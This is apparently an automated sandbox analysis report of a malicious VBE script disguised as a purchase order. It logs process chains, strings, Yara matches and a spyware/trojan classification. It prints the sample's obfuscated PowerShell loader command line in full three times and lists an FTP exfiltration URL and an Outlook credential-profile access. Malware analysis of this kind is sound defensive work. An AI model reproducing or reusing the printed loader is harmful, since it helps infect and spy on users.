          Source: powershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.orgftp://ftp.mcmprint.netklogz
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
          Source: unknown | DNS traffic detected: queries for: b3solutionscws.com
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_1D5FA09A recv,

          System Summary

          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp 
abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
          Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 4705
          Source: PO-08784 xlsx.vbe, type: SAMPLEMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00C5A648
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00C5EB00
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00C5EB10
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C6C3E0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C6D0D0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C6DA18
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CB4EA8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CB78B0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CB25A9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CB25B8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D352C0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D352B8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D30040
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D30007
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C64481
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D770B8D
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1F9CE5EA
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1F9C8B70
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1F9C7400
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_2037AC70
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_203794D0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20374510
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_2037DE10
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20376688
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20370B12
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20451540
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20454460
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20452D03
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_204548A0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_204514D4
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D5FB206 NtQuerySystemInformation,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D5FB1D5 NtQuerySystemInformation,
          Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: security.dll
          Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp 
abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D5FAAB6 AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D5FAA7F AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zft31ohr.hmb.ps1
          Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBE@13/10@3/3
          Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:304:WilStaging_02
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
          Source: Binary string: $}l8C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.pdb source: powershell.exe, 00000004.00000002.1687266902.0000000004531000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          Source: Yara match File source: 00000004.00000002.1784183387.00000000093A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000000.1525854532.0000000001100000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp 
abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00C5CF89 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C677C7 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C625D3 push esp; iretd
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C6D5A0 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C61CA3 push eax; retf
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C67B91 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C67A9E push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C6E8B0 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CBCDA1 push es; retf 0007h
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CBF579 push esp; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CBE4D0 push ss; retf 0007h
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CBE4F1 push ss; retf 0007h
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CB7348 push esp; iretd
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D3C9B0 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D3BCF1 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D3CC82 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dll
          Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX

